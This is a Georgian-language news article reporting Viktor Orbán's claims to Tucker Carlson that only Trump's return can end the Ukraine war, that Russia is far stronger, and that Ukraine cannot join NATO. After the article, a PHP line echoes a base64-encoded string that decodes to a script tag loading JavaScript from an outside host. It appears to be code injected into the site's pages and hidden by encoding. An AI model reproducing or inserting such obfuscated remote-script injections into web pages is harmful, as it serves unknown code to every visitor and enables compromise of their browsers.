celsiusi
ავერსი შნაიდერი

ერთადერთი გზა, რომ უკრაინაში ომი დასრულდეს, ტრამპის პრეზიდენტად ხელახალი არჩევა იქნება, – ამის შესახებ უნგრეთის პრემიერ-მინისტრმა, ვიქტორ ორბანმა ტაკერ კარლსონთან ინტერვიუში განაცხადა.

უნგრეთის პრემიერ-მინისტრის თქმით, ტრამპის დაბრუნება იქნება კონფლიქტის დასრულების ერთადერთი გზა, ხოლო ნებისმიერი მოსაზრება, რომელიც უკრაინის ომში მოგებას უსვამს ხაზს, მცდარია.

„რუსეთი ბევრად ძლიერია, ვიდრე უკრაინა. დააბრუნეთ ტრამპი, ის ერთადერთია, რომელსაც დასავლეთის გადარჩენა შეუძლია“, – აღნიშნა ორბანმა.

ორბანის თქმით, მიუხედავად იმისა, რომ უნგრეთი ნატო-ს წევრი და აშშ-ის მოკავშირეა, უნგრეთს რუსებზე უარესად ექცევიან.

მისივე თქმით, 2008 წლის ბუქარესტის სამიტზე, როდესაც უკრაინის ნატო-ში გაწევრიანების იდეა გაჩნდა, რუსეთი არ იყო იმდენად ძლიერი, რომ შეეჩერებინა ეს პროცესი.

„ნამდვილად არსებობდა შანსი, რომ უკრაინა ნატო-ს წევრი გამხდარიყო, მაგრამ დასავლეთის ქვეყნებმა ამ შეთანხმებას ვერ მიაღწიეს. ორი-სამი წლის შემდეგ რუსეთი გაძლიერდა, ახლა კიდევ უფრო ძლიერები არიან, ვიდრე მაშინ. ჩვენ ხელიდან გავუშვით ისტორიული მომენტი. ეს შესაძლებლობების ფანჯარა აღარ არის გახსნილი. ამიტომ, ჩვენ ვერ შევძლებთ, გვქონდეს გრძელი საზღვარი რუსეთსა და უკრაინას შორის, რომელიც ეკუთვნის ნატო-ს. ეს ნიშნავს ომის საშიშროებას ყველა ჩვენგანისთვის, მათ შორის ამერიკის შეერთებული შტატებისთვისაც. ჩვენ რუსეთთან უსაფრთხოების ახალი არქიტექტურის შესახებ შეთანხმება უნდა დავდოთ, რათა უზრუნველყოთ უკრაინის უსაფრთხოება და სუვერენიტეტი, მისი ნატო-ში გაწევრიანების გარეშე“, – განაცხადა ორბანმა.

მისივე თქმით, ყირიმის დაბრუნება უკრაინისთვის სავსებით არარეალისტურია.

„უკრაინა ომის წაგებასთან ახლოს დგას, რადგან რუსულ ჯარს რიცხობრივი უპირატესობა აქვს“, – განაცხადა ორბანმა.

413
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");